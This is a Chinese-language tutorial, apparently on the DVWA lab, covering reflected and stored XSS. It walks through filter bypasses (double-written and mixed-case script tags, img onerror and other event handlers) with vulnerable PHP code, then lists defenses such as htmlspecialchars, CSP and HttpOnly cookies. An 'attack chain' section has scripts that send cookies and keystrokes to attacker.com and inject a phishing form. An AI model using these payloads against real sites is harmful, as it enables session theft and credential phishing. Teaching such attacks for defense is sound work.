news 2026/5/30 21:09:05

XSS跨站脚本攻击

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
XSS跨站脚本攻击

XSS类型概述

三种XSS类型

  • 反射型:最常见,非持久化
  • 存储型:最危险,持久化存储
  • DOM型:基于前端JavaScript,本文不涉及

反射型XSS(Reflected XSS)

标准测试Payload

<script>alert(1)</script><script>alert('XSS')</script>

单引号和双引号都可以使用。

漏洞识别

测试流程

1. 输入框输入: zengjun 2. 页面返回: Hello zengjun 3. 查看源代码: <pre>Hello zengjun</pre> 4. 观察输入点位置和闭合方式

判断标准:用户输入直接反映在HTML中。

Low级别攻击

Payload

zeng<script>alert('XSS')</script>jun

原理

<!-- 后端代码 --><?php $name = $_GET['name']; echo "<pre>Hello " . $name . "</pre>"; ?><!-- 渲染结果 --><pre>Hello zeng<script>alert('XSS')</script>jun</pre>

浏览器解析HTML时会执行<script>标签中的JavaScript代码。

Medium级别绕过

防护代码

$name=str_replace('<script>','',$_GET['name']);

绕过方法1:双写绕过

<sc<script>ript>alert(1)</script>

原理

输入: <sc<script>ript>alert(1)</script> 过滤: <sc ript>alert(1)</script> (中间的<script>被删除) 结果: <script>alert(1)</script>

绕过方法2:大小写绕过

<sCRipt>alert(1)</script><SCRIPT>alert(1)</SCRIPT>

原理:HTML不区分标签大小写,但str_replace区分。

High级别绕过

防护代码

$name=preg_replace('/<script\b[^>]*>(.*?)<\/script>/is',"",$_GET['name']);

使用正则表达式过滤所有<script>标签(包括大小写和嵌套)。

绕过方法:利用其他HTML事件

<imgsrc='x'onerror='alert(1)'/>

原理

  • src='x'- 图片路径不存在,加载失败
  • onerror- 加载失败时触发事件
  • 执行JavaScript代码

其他可用事件

<imgsrc='x'onmouseover='alert(1)'/><!-- 鼠标悬停 --><imgsrc='x'onmousedown='alert(1)'/><!-- 鼠标按下 --><imgsrc='x'onmouseup='alert(1)'/><!-- 鼠标松开 --><bodyonload='alert(1)'><!-- 页面加载 --><inputonfocus='alert(1)'><!-- 获得焦点 -->

Impossible级别(完美防护)

<?php$name=htmlspecialchars($_GET['name']);?>

htmlspecialchars()函数

< 转换为 &lt; > 转换为 &gt; " 转换为 &quot; ' 转换为 &#039; & 转换为 &amp;

效果:所有HTML标签都被转义为实体编码,作为纯文本显示。

输入:<script>alert(1)</script>输出:&lt;script&gt;alert(1)&lt;/script&gt;显示:<script>alert(1)</script>(纯文本,不执行)

存储型XSS(Stored XSS)

危害分析

为什么更危险

  • 持久化存储:保存在数据库中
  • 影响范围广:所有访问者都会中招
  • 隐蔽性强:不需要诱导点击

常见场景

  • 在线留言板
  • 论坛评论
  • 用户资料页
  • 直播弹幕

Low级别攻击

测试步骤

Name: xiaoli Message: <script>alert('Stored XSS')</script> 点击Sign Guestbook

效果:每个访问留言板的用户都会触发弹窗。

后端代码

<?php$name=$_POST['txtName'];$message=$_POST['mtxMessage'];$query="INSERT INTO guestbook (name, comment) VALUES ('$name', '$message')";mysqli_query($conn,$query);?>

完全没有过滤,直接存入数据库。

Medium级别绕过

防护代码

$name=strip_tags($_POST['txtName']);// 移除HTML标签$message=$_POST['mtxMessage'];// 留言板不过滤

问题

  • Name字段有字符长度限制(前端)
  • Message字段无过滤

绕过方法:抓包修改

1. 输入任意内容并提交 2. Burp Suite抓包 3. 修改Name字段: txtName=<sc<script>ript>alert(1)</script> 4. Forward放行

High级别绕过

防护代码

$name=preg_replace('/<script\b[^>]*>(.*?)<\/script>/is','',$_POST['txtName']);$message=preg_replace('/<script\b[^>]*>(.*?)<\/script>/is','',$_POST['mtxMessage']);

绕过方法

<imgsrc='x'onerror='alert(1)'/>

在Name字段通过抓包修改即可。

XSS攻击链

完整攻击流程

// 1. 窃取Cookie<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>// 2. 键盘记录<script>document.onkeypress=function(e){fetch('http://attacker.com/log.php?key='+e.key);}</script>// 3. 网络钓鱼<script>document.body.innerHTML='<form action="http://attacker.com/phish.php">...';</script>

XSS防护完整方案

输入验证

// 白名单验证if(!preg_match('/^[a-zA-Z0-9_]+$/',$input)){die("非法字符");}

输出编码

// HTML上下文echohtmlspecialchars($input,ENT_QUOTES,'UTF-8');// JavaScript上下文echojson_encode($input);// URL上下文echourlencode($input);

Content Security Policy

<metahttp-equiv="Content-Security-Policy"content="default-src'self'; script-src'self'">

HttpOnly Cookie

setcookie('session',$value,['httponly'=>true,// 防止JavaScript访问'secure'=>true,// 仅HTTPS传输'samesite'=>'Strict']);
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/28 18:49:53

Linux应用与驱动开发:mmap和内存映射

学习笔记&#xff1a;Linux 驱动开发之 mmap 与内存映射 1. 核心概念&#xff1a;什么是 mmap&#xff1f; mmap (Memory Map) 是一种内存映射文件的方法。在嵌入式 Linux 驱动开发中&#xff0c;它主要用于将外设的物理地址&#xff08;如 GPIO 寄存器&#xff09;映射到用户进…

作者头像 李华
网站建设 2026/5/28 15:36:47

多FDCAN接口同步配置实战:双通道并行通信实现

多FDCAN接口实战&#xff1a;双通道并行通信如何突破带宽瓶颈你有没有遇到过这样的情况&#xff1f;在开发一个高实时性的车载控制模块时&#xff0c;CAN总线突然“卡顿”——数据延迟飙升、报文丢失频发。排查一圈后发现&#xff0c;并不是硬件故障&#xff0c;而是单条CAN通道…

作者头像 李华
网站建设 2026/5/30 18:51:45

Day 34:【99天精通Python】单元测试 (Unittest) - 给代码上个保险

Day 34&#xff1a;【99天精通Python】单元测试 (Unittest) - 给代码上个保险 前言 欢迎来到第34天&#xff01; 在之前的开发中&#xff0c;我们通常是怎么验证代码对不对的&#xff1f; —— 写完代码&#xff0c;手动运行一下&#xff0c;输入几个参数&#xff0c;看看打印结…

作者头像 李华
网站建设 2026/5/28 18:49:56

基于Simulink的混合PO与INC切换MPPT策略仿真

目录 手把手教你学Simulink 一、引言&#xff1a;为什么需要“混合P&O与INC”&#xff1f; 二、系统整体架构 控制流程&#xff1a; 三、核心算法详解 1. P&O 算法&#xff08;扰动观察法&#xff09; 2. INC 算法&#xff08;电导增量法&#xff09; 3. 光照突…

作者头像 李华
网站建设 2026/5/28 19:19:26

工业场景中弧形导轨的安装要点

弧形导轨作为工业自动化中实现弧线运动的核心部件&#xff0c;常用于机械臂关节、旋转工作台、自动化生产线转弯部位&#xff0c;医疗CT机的旋转扫描部件也依赖高精度弧形导轨实现平滑运动。其安装质量直接影响设备运行精度与寿命&#xff0c;从材料准备到定位调试&#xff0c;…

作者头像 李华